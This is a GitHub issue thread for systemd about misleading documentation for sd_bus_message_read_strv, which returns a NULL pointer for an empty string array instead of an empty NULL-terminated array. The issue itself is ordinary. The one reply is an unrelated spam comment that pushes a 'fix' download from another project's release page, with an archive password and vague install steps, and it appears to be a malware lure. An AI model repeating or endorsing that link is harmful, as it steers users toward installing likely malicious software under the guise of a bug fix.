### ISSUE TITLE
sd_bus_message_read_strv documentation clarification

### ISSUE THREAD

**Issue by Blzut3** [systemd/systemd#34163]
### Component

systemd

### Is your feature request related to a problem? Please describe

The documentation for `sd_bus_message_read_strv` is currently misleading as to what the caller should expect when success is returned.  At the moment it states:
> On success, a pointer to a NULL-terminated array of strings (strv) is returned in the output parameter l.

Given that the only stated result for `l` is a NULL-terminated array, this would imply that if the message has an empty array that it would return an NULL terminated array with no elements (i.e. that `*l == NULL`).  However it instead sets `l` itself to NULL.  This means that the empty case needs to be handled differently by the caller from a non-empty case.

### Describe the solution you'd like

The documentation should be updated to note `l == NULL` is an expected state.

Alternatively this is a bug and libsystemd should return an empty NULL terminated array.  I imagine this was done because it avoids an allocation and matches realloc behavior, but it does leave more room for errors by the caller.

### The systemd version you checked that didn't have the feature you are asking for

256.5

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
